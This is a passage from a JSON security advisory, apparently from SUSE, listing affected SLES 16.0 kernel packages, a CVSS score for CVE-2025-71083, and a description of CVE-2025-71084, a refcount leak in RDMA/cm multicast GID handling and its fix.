"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
